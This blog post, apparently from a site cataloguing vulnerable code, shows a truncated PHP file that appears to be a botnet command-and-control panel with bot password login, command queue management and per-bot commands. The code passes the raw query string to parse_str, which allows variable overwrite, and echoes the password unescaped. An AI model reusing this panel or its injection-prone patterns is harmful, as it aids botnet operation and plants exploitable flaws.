Popular Vulnerable Code

«  
  »

Writing

Writing is a struggle against silence.
Carlos Fuentes

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title></title>
<meta http-equiv="Content-Type"content="text/html;charset=iso-8859-1">

<?php
include("./config.php");
include("./functions.php");

$query = $_SERVER['QUERY_STRING'];
parse_str($query);

ConnectToDB($server, $user, $pw, $dbname);
?>

<style type="text/css">
<!--
@import url("./style.css");
-->
</style>

<script>
<!--
function setfocus()
{
 document.form1.cmd.focus();
 document.form1.logfield.scrollTop = '9999';
}
-->
</script>

</head>

<body onload="setfocus()">
<?php
if($_POST['pw']!=$botpw)
{
?>
<table width="242"border="0"cellpadding="0"cellspacing="0"bgcolor="#D0EAD2"class="tableborder">
 <!--DWLayoutTable-->
 <tr>
  <td width="239"height="44"valign="top"><form action="./control.php"method="post"name="login"id="login">
    Password:<br>
    <input name="pw"type="password"id="pw">
    <input name="login"type="submit"id="login"value="Login">
  </form></td>
 </tr>
</table>
<?php
}
else
{
?>
<table width="516"border="0"cellpadding="0"cellspacing="0"bgcolor="#D5E1F0"class="tableborder">
    <!--DWLayoutTable-->
    <tr>
     <td width="78"height="43"valign="middle"><form action="./control.php"method="post"name="logout"id="logout">
       <input name="logout"type="submit"id="logout"value="Logout">
     </form></td>
     <td width="143"valign="middle"><form action="./control.php"method="post"name="command"id="command">
       <input name="command"type="submit"id="command"value="Command center">
       <input name="pw"type="hidden"id="pw"value="<?php echo($_POST['pw']); ?>">
     </form></td>
   <td width="193"valign="middle"><form action="./control.php"method="post"name="queue"id="queue">
       <input name="queue"type="submit"id="queue"value="Manage commandqueue">
       <input name="pw"type="hidden"id="pw"value="<?php echo($_POST['pw']); ?>">
     </form></td>
     <td width="101"valign="middle"><form action="./control.php"method="post"name="logdel"id="logdel">
       <input name="logdel"type="submit"id="logdel"value="Delete log">
       <input name="pw"type="hidden"id="pw"value="<?php echo($_POST['pw']); ?>">
     </form></td>
    </tr>
</table>
<?php
if(isset($_POST['queue']))
{

if(isset($_POST['action']))
{
 if($_POST['action']==2)
 {
  DeleteCommandsFromQueue();  
 }
 
 if($_POST['action']==4)
 {
  EditCommandForBot();  
 }
}

if($_POST['action']!=3)
{
?>
<br>
<form action="./control.php"method="post"name="form1"id="form1">
<table width="648"border="0"cellpadding="0"cellspacing="0"bgcolor="#F2ECD7"class="tableborder">
 <!--DWLayoutTable-->
 <tr>
  <td height="486"colspan="2"valign="top">Bot:<br>
     <select name="botselect"id="botselect">
   <?php
   ShowAllBotsCmdList();
   ?>
    </select>
If you enjoyed this post,make sure you subscribe to my RSS feed!
July 14th,2011 | Category:Code Snippet

1 comment to Writing

Leave a Reply

  

  

  

You can use these HTML tags

<a href=""title=""><abbr title=""><acronym title=""><b><blockquote cite=""><cite><code><del datetime=""><em><i><q cite=""><strike><strong><pre lang=""line=""escaped=""highlight="">